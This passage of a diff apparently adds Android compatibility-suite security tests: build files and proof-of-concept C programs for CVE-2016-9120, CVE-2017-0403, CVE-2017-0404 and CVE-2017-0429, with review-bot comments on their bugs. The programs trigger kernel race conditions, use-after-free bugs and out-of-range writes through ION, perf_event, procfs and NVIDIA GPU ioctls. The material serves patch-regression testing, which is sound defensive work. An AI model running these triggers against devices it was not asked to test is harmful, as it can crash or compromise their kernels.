+ LOG("[+] NVMAP_IOC_ALLOC succeeded");
+
+ /* create close thread */
+ attack = 1;
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
+ }
+ LOG("[+] running...");
+ while(1) {
+ ret = ioctl(vic, NVHOST_IOCTL_CHANNEL_SUBMIT, &submit);
+ }
+
+ LOG("[-] passed :(");
+ attack = 0;
+ for(i = 0; i < CLOSE_THREAD_NUM; i++) {
+ pthread_join(close_thread_id[i], NULL);
+ }
+
+ return 0;
+}
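Review bot: The submit loop `while(1) { ret = ioctl(vic, NVHOST_IOCTL_CHANNEL_SUBMIT, &submit); }` in `main` has no exit, so `LOG("[-] passed :(")`, `attack = 0` and the `pthread_join` loop below it are unreachable. The binary only ends when something outside kills it, which means a patched device shows up as a hang rather than a pass. `TRY_TIMES` is defined but unused; bounding the loop with it or a larger constant, e.g. `for(j = 0; j < TRY_TIMES; j++)`, or with a time limit, would let the run finish and report. The two `open` failures are only logged, so the later ioctls run on descriptor -1; return early instead, e.g. `if(nvmap == -1 || vic == -1) return 1;`. `dma2` and `err2` are declared but never used.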
diff --git a/hostsidetests/security/securityPatch/CVE-2016-9120/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-9120/Android.mk
new file mode 100644
index 0000000..95ddb3d
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-9120/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-9120
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-9120/poc.c b/hostsidetests/security/securityPatch/CVE-2016-9120/poc.c
new file mode 100644
index 0000000..c03ee45
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-9120/poc.c
@@ -0,0 +1,175 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <errno.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+typedef int ion_user_handle_t;
+
+enum ion_heap_type {
+ ION_HEAP_TYPE_SYSTEM,
+ ION_HEAP_TYPE_SYSTEM_CONTIG,
+ ION_HEAP_TYPE_CARVEOUT,
+ ION_HEAP_TYPE_CHUNK,
+ ION_HEAP_TYPE_DMA,
+ ION_HEAP_TYPE_CUSTOM, /* must be last so device specific heaps always
+ are at the end of this enum */
+ ION_NUM_HEAPS = 16,
+};
+
+#define ION_HEAP_SYSTEM_MASK (1 << ION_HEAP_TYPE_SYSTEM)
+#define ION_HEAP_SYSTEM_CONTIG_MASK (1 << ION_HEAP_TYPE_SYSTEM_CONTIG)
+#define ION_HEAP_CARVEOUT_MASK (1 << ION_HEAP_TYPE_CARVEOUT)
+#define ION_HEAP_TYPE_DMA_MASK (1 << ION_HEAP_TYPE_DMA)
+
+#define ION_NUM_HEAP_IDS sizeof(unsigned int) * 8
+
+struct ion_allocation_data {
+ size_t len;
+ size_t align;
+ unsigned int heap_id_mask;
+ unsigned int flags;
+ ion_user_handle_t handle;
+};
+
+
+struct ion_fd_data {
+ ion_user_handle_t handle;
+ int fd;
+};
+
+
+struct ion_handle_data {
+ ion_user_handle_t handle;
+};
+
+
+struct ion_custom_data {
+ unsigned int cmd;
+ unsigned long arg;
+};
+#define ION_IOC_MAGIC 'I'
+
+#define ION_IOC_ALLOC _IOWR(ION_IOC_MAGIC, 0, \
+ struct ion_allocation_data)
+
+#define ION_IOC_FREE _IOWR(ION_IOC_MAGIC, 1, struct ion_handle_data)
+
+
+#define ION_FLAG_CACHED 1 /* mappings of this buffer should be
+ cached, ion will do cache
+ maintenance when the buffer is
+ mapped for dma */
+#define ION_FLAG_CACHED_NEEDS_SYNC 2 /* mappings of this buffer will created
+ at mmap time, if this is set
+ caches must be managed manually */
+
+int g_fd = -1;
+struct ion_allocation_data* g_allocation = NULL;
+struct ion_handle_data g_free_data;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+
+int open_driver() {
+ char* dev_path = "/dev/ion";
+ g_fd = open(dev_path, O_RDONLY);
+ if (g_fd < 0) {
+ printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+ } else {
+ printf("[*] open file(%s) succ!\n", dev_path);
+ }
+ return g_fd;
+}
+
+void prepare_data() {
+ void* data = malloc(0x1000);
+
+ g_allocation = (struct ion_allocation_data*)data;
+
+ g_allocation->len = 0x1000;
+ g_allocation->align = 8;
+ g_allocation->heap_id_mask = 1 << 25;
+ g_allocation->flags = ION_FLAG_CACHED;
+ g_allocation->handle = -1;
+
+ mprotect(data, 0x1000, PROT_READ);
+ printf("[*] mprotect, error = %d\n", errno);
+
+ g_free_data.handle = 1;
+}
+
+void trigger_ion_alloc() {
+ ioctl(g_fd, ION_IOC_ALLOC, g_allocation);
+}
+
+void trigger_ion_free() {
+ ioctl(g_fd, ION_IOC_FREE, &g_free_data);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ }
+}
+void* race_thread(void* arg) {
+ setup_privi_and_affinity(-19, 2);
+ while (1) {
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ trigger_ion_free();
+ pthread_mutex_unlock(&mutex);
+ }
+
+}
+
+
+int main(int argc, char**argv) {
+ if (open_driver() < 0) {
+ return -1;
+ }
+ setup_privi_and_affinity(0, 1);
+ prepare_data();
+ pthread_t tid;
+ pthread_create(&tid, NULL, race_thread, NULL);
+ sleep(1);
+ while (1) {
+ pthread_cond_signal(&cond);
+ usleep(100);
+ trigger_ion_alloc();
+ sleep(1);
+ }
+
+ return 0;
+}
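Review bot: `prepare_data` prints `errno` after `mprotect(data, 0x1000, PROT_READ)` without looking at the call's return value, so the message shows a stale error number on success and the run continues when the call failed. `malloc` is not checked either before `g_allocation->len` is written. Check the result, e.g. `if (mprotect(data, 0x1000, PROT_READ) != 0) perror("mprotect");`, and stop when setup did not succeed. In `setup_privi_and_affinity` the `sched_setaffinity` failure branch is empty and the `setpriority` result is dropped, so a run without its intended scheduling setup looks the same as one that had it. `main` and `race_thread` both loop forever, which leaves `return 0;` unreachable and gives the caller no completion signal or verdict.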
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0403/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0403/Android.mk
new file mode 100644
index 0000000..cb31e4d
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0403/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0403
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0403/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0403/poc.c
new file mode 100644
index 0000000..51095e7
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0403/poc.c
@@ -0,0 +1,233 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+//overwrite object+0x20,like a list initilize
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <string.h>
+#include <sys/wait.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+
+
+struct perf_event_attr {
+
+ /*
+ * Major type: hardware/software/tracepoint/etc.
+ */
+ __u32 type;
+
+ /*
+ * Size of the attr structure, for fwd/bwd compat.
+ */
+ __u32 size;
+
+ /*
+ * Type specific configuration information.
+ */
+ __u64 config;
+
+ union {
+ __u64 sample_period;
+ __u64 sample_freq;
+ };
+
+ __u64 sample_type;
+ __u64 read_format;
+
+ __u64 disabled : 1, /* off by default */
+ inherit : 1, /* children inherit it */
+ pinned : 1, /* must always be on PMU */
+ exclusive : 1, /* only group on PMU */
+ exclude_user : 1, /* don't count user */
+ exclude_kernel : 1, /* ditto kernel */
+ exclude_hv : 1, /* ditto hypervisor */
+ exclude_idle : 1, /* don't count when idle */
+ mmap : 1, /* include mmap data */
+ comm : 1, /* include comm data */
+ freq : 1, /* use freq, not period */
+ inherit_stat : 1, /* per task counts */
+ enable_on_exec : 1, /* next exec enables */
+ task : 1, /* trace fork/exit */
+ watermark : 1, /* wakeup_watermark */
+ /*
+ * precise_ip:
+ *
+ * 0 - SAMPLE_IP can have arbitrary skid
+ * 1 - SAMPLE_IP must have constant skid
+ * 2 - SAMPLE_IP requested to have 0 skid
+ * 3 - SAMPLE_IP must have 0 skid
+ *
+ * See also PERF_RECORD_MISC_EXACT_IP
+ */
+ precise_ip : 2, /* skid constraint */
+ mmap_data : 1, /* non-exec mmap data */
+ sample_id_all : 1, /* sample_type all events */
+
+ exclude_host : 1, /* don't count in host */
+ exclude_guest : 1, /* don't count in guest */
+
+ exclude_callchain_kernel : 1, /* exclude kernel callchains */
+ exclude_callchain_user : 1, /* exclude user callchains */
+ constraint_duplicate : 1,
+
+ __reserved_1 : 40;
+
+ union {
+ __u32 wakeup_events; /* wakeup every n events */
+ __u32 wakeup_watermark; /* bytes before wakeup */
+ };
+
+ __u32 bp_type;
+ union {
+ __u64 bp_addr;
+ __u64 config1; /* extension of config */
+ };
+ union {
+ __u64 bp_len;
+ __u64 config2; /* extension of config1 */
+ };
+ __u64 branch_sample_type; /* enum perf_branch_sample_type */
+
+ /*
+ * Defines set of user regs to dump on samples.
+ * See asm/perf_regs.h for details.
+ */
+ __u64 sample_regs_user;
+
+ /*
+ * Defines size of the user stack to dump on samples.
+ */
+ __u32 sample_stack_user;
+
+ /* Align to u64. */
+ __u32 __reserved_2;
+};
+
+
+#define PAIR_FD 1
+
+int group_fd[PAIR_FD],child_fd[PAIR_FD];
+
+long created = 0;
+long freed = 0;
+long finished = 0;
+
+void *thr(void *arg) {
+ printf("id=%d arg=%d\n",gettid(),arg);
+
+ int i;
+ struct perf_event_attr attr;
+
+ switch ((long)arg) {
+ case 0:
+ //#16123
+ printf("thread 0\n");
+ memset(&attr,0,sizeof(struct perf_event_attr));
+ attr.type = 1;
+ attr.size = sizeof(struct perf_event_attr);
+ attr.config = 1;
+
+ group_fd[0] = syscall(__NR_perf_event_open, &attr, 0x0ul, -1,
+ -1, 0x1ul, 0);
+
+ if(group_fd[0]<0){
+ perror("perf-group:");
+ }
+
+
+ memset(&attr,0,sizeof(struct perf_event_attr));
+ attr.type = 1;
+ attr.size = sizeof(struct perf_event_attr);
+ attr.config = 5;
+
+ child_fd[0] = syscall(__NR_perf_event_open, &attr,0x0ul, 0x6ul, group_fd[0], 0x0ul, 0);
+
+ if(group_fd[0]<0){
+ perror("perf-child:");
+ }
+
+ created = 1;
+ break;
+ case 1:
+
+ while(!created){
+ sleep(1);
+ }
+
+ printf("thread 1\n");
+ close(group_fd[0]);
+
+ freed = 1;
+
+ break;
+ case 2:
+
+ printf("thread 2\n");
+
+ while(!freed){
+ sleep(1);
+ }
+
+ close(child_fd[0]);
+
+ finished = 1;
+
+ break;
+
+ }
+ return 0;
+}
+
+int poc() {
+ long i;
+ pthread_t th[5];
+ for (i = 0; i < 3; i++) {
+ pthread_create(&th[i], 0, thr, (void *)i);
+ usleep(10000);
+ }
+
+ while(!finished){
+ sleep(1);
+ }
+
+ return 0;
+}
+
+
+int main(int argc, char const *argv[])
+{
+ int pid;
+ unsigned int times;
+ times = 0;
+ printf("POC3\n");
+ printf("Please enable CONFIG_SLUB_DEBUG_ON and check the posion overwriten message in kernel\n");
+ fflush(stdout);
+
+ // while(1){
+ pid = fork();
+ if(pid){
+ int status;
+ int ret = waitpid(pid,&status,0);
+
+ printf("[%d]times.\r",times);
+ times++;
+ }else
+ return poc();
+ // }
+ return 0;
+}
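Review bot: In `thr` case 0, the check after the second `perf_event_open` call tests `group_fd[0]` again, so a failure to create the child event is never reported; it should read `if(child_fd[0]<0){` before `perror("perf-child:");`. Neither failure stops the sequence, so threads 1 and 2 go on to `close()` a descriptor of -1 and the run ends looking like a normal completion. `printf("id=%d arg=%d\n",gettid(),arg)` passes a `void *` for `%d`; `(long)arg` with `%ld` would match the cast already used in the `switch`. `created`, `freed` and `finished` are plain `long`s polled across threads with no synchronisation, so the ordering the three cases rely on is not guaranteed by the language.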
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0404/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0404/Android.mk
new file mode 100644
index 0000000..9e30d30
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0404/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0404
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
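Review bot: The warning and hardening flags on the `CFLAGS +=` lines, and `LDFLAGS += -rdynamic`, are probably never applied to this module, because an Android.mk module takes its per-module flags from `LOCAL_CFLAGS` and `LOCAL_LDFLAGS`, and only `LOCAL_LDFLAGS += -fPIE -pie` uses that form here. If the flags are wanted, write them as `LOCAL_CFLAGS += -Wall -W -g -O2 ...`; if not, drop the lines so the file does not suggest that `-D_FORTIFY_SOURCE=2` and `-Wformat=2` are in effect. The same block is repeated in CVE-2017-0429/Android.mk.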
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0404/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0404/poc.c
new file mode 100644
index 0000000..54821ef
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0404/poc.c
@@ -0,0 +1,49 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sys/prctl.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <pthread.h>
+#include <fcntl.h>
+#include <sys/stat.h>
+#include <semaphore.h>
+#include <sys/socket.h>
+#include <sys/mman.h>
+#include <signal.h>
+#include <sys/wait.h>
+#include <sys/ioctl.h>
+#include <sys/utsname.h>
+#include <sys/ptrace.h>
+
+char buf[4096];
+
+int main(int argc, char const *argv[]){
+ memset(buf, 0xa0, sizeof(buf));
+
+ int fd = open("/proc/asound/version", O_RDWR);
+ if(fd != -1){
+ lseek(fd, 0x1234567800000000, SEEK_SET);
+ write(fd, buf, sizeof(buf));
+ }else{
+ perror("open error\n");
+ }
+ close(fd);
+ return 0;
+}
\ No newline at end of file
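Review bot: `close(fd)` runs on the failure path too, so when `open` fails the program calls `close(-1)`; move the call inside the `if (fd != -1)` branch. The results of `lseek` and `write` are discarded, so the output cannot show whether the kernel rejected the out-of-range write or the write never happened; a line such as `if (write(fd, buf, sizeof(buf)) < 0) perror("write");` would make the log usable when triaging a failed run. `perror("open error\n")` puts a newline in front of the errno text, so drop the `\n`.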
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0429/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0429/Android.mk
new file mode 100644
index 0000000..afb77b4
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0429/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0429
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0429/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0429/poc.c
new file mode 100644
index 0000000..4ef1b3e
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0429/poc.c
@@ -0,0 +1,179 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+// for syscall
+#include <sys/syscall.h>
+// for futex
+#include <linux/futex.h>
+#include <sys/time.h>
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt ": %d(%d)\n", ##__VA_ARGS__, errno, errno)
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+
+#define NVMAP_IOC_MAGIC 'N'
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ return ret;
+}
+
+#define SZ_128K 0x00020000
+#define NVHOST_AS_IOCTL_MAGIC 'A'
+struct nvhost_as_bind_channel_args {
+ __u32 channel_fd; /* in */
+} __packed;
+#define NVHOST_AS_IOCTL_BIND_CHANNEL \
+ _IOWR(NVHOST_AS_IOCTL_MAGIC, 1, struct nvhost_as_bind_channel_args)
+
+struct nvhost_as_free_space_args {
+ __u64 offset; /* in, byte address */
+ __u32 pages; /* in, pages */
+ __u32 page_size; /* in, bytes */
+};
+#define NVHOST_AS_IOCTL_FREE_SPACE \
+ _IOWR(NVHOST_AS_IOCTL_MAGIC, 3, struct nvhost_as_free_space_args)
+
+#define NVHOST_AS_ALLOC_SPACE_FLAGS_SPARSE 0x2
+struct nvhost_as_alloc_space_args {
+ __u32 pages; /* in, pages */
+ __u32 page_size; /* in, bytes */
+ __u32 flags; /* in */
+ __u32 padding; /* in */
+ union {
+ __u64 offset; /* inout, byte address valid iff _FIXED_OFFSET */
+ __u64 align; /* in, alignment multiple (0:={1 or n/a}) */
+ } o_a;
+};
+#define NVHOST_AS_IOCTL_ALLOC_SPACE \
+ _IOWR(NVHOST_AS_IOCTL_MAGIC, 6, struct nvhost_as_alloc_space_args)
+
+#define CLOSE_THREAD_NUM 1
+#define TRY_TIMES 2
+#define NVMAPDEV "/dev/nvmap"
+#define GPUDEV "/dev/nvhost-gpu"
+#define ASDEV "/dev/nvhost-as-gpu"
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+int nvmap, gpu, asgpu;
+volatile int attack;
+
+int main(void)
+{
+ int i, j, ret;
+ int dma1, dma2;
+ struct nvmap_create_handle args = {
+ .size = PAGE_SIZE
+ };
+ struct nvhost_as_bind_channel_args as_bind = { 0 };
+ struct nvhost_as_alloc_space_args alloc = {
+ .pages = 1,
+ .page_size = SZ_128K,
+ .flags = NVHOST_AS_ALLOC_SPACE_FLAGS_SPARSE
+ };
+ struct nvhost_as_free_space_args free_arg = {
+ .pages = 1,
+ .page_size = SZ_128K
+ };
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ nvmap = open(NVMAPDEV, O_RDONLY);
+ if(nvmap == -1) {
+ ERR("[-] open %s failed", NVMAPDEV);
+ goto __cleanup;
+ }
+ gpu = open(GPUDEV, O_RDONLY);
+ if(gpu == -1) {
+ ERR("[-] open %s failed", GPUDEV);
+ goto __cleanup;
+ }
+ asgpu = open(ASDEV, O_RDONLY);
+ if(asgpu == -1) {
+ ERR("[-] open %s failed", ASDEV);
+ goto __cleanup;
+ }
+ // bind the channel
+ as_bind.channel_fd = gpu;
+ ret = ioctl(asgpu, NVHOST_AS_IOCTL_BIND_CHANNEL, &as_bind);
+ if(ret == -1) {
+ ERR("[-] NVHOST_AS_IOCTL_BIND_CHANNEL failed");
+ goto __cleanup;
+ } else {
+ //LOG("[+] ioctl OK, channel is bond");
+ }
+
+ #if 1
+ // prepare
+ ret = ioctl(nvmap, NVMAP_IOC_CREATE, &args);
+ if(ret) {
+ ERR("[-] NVMAP_IOC_CREATE failed");
+ goto __cleanup;
+ }
+ #endif
+
+ ret = ioctl(asgpu, NVHOST_AS_IOCTL_ALLOC_SPACE, &alloc);
+ if(ret) {
+ ERR("[-] NVHOST_AS_IOCTL_ALLOC_SPACE failed");
+ goto __cleanup;
+ }
+ free_arg.offset = alloc.o_a.offset;
+ ret = ioctl(asgpu, NVHOST_AS_IOCTL_FREE_SPACE, &free_arg);
+ if(ret) {
+ ERR("[-] NVHOST_AS_IOCTL_FREE_SPACE failed");
+ goto __cleanup;
+ }
+
+__cleanup:
+ close(nvmap);
+ close(gpu);
+ close(asgpu);
+ return 0;
+}
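Review bot: The `__cleanup` path closes descriptors that were never opened: `nvmap`, `gpu` and `asgpu` are zero-initialised globals, so if the first `open` fails the label runs `close(-1)` and then `close(0)` twice, which closes stdin. Initialise them as `int nvmap = -1, gpu = -1, asgpu = -1;` and close each one only when it is `>= 0`. `i`, `j`, `dma1`, `dma2`, `close_thread_id` and `attack` are declared but not used in this file and can be removed. `PAGE_SIZE` is used without a visible definition; presumably it arrives through one of the included headers, which is worth confirming for both the 32-bit and 64-bit builds.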
diff --git a/hostsidetests/security/src/android/security/cts/AdbUtils.java b/hostsidetests/security/src/android/security/cts/AdbUtils.java
index a3018fa..fa9934f 100644
--- a/hostsidetests/security/src/android/security/cts/AdbUtils.java
+++ b/hostsidetests/security/src/android/security/cts/AdbUtils.java
@@ -30,6 +30,7 @@
import java.io.InputStream;
import java.io.OutputStream;
import java.util.Scanner;
+import java.util.concurrent.TimeUnit;
public class AdbUtils {
@@ -39,8 +40,7 @@
* @param device device for the command to be ran on
* @return the console output from running the command
*/
- public static String runCommandLine(String command, ITestDevice device) throws Exception
- {
+ public static String runCommandLine(String command, ITestDevice device) throws Exception {
return device.executeShellCommand(command);
}
@@ -51,17 +51,25 @@
* @param device device to be ran on
* @return the console output from the binary
*/
- public static String runPoc(String pathToPoc, ITestDevice device) throws Exception {
- String fullResourceName = pathToPoc;
- File pocFile = File.createTempFile("poc", "");
- try {
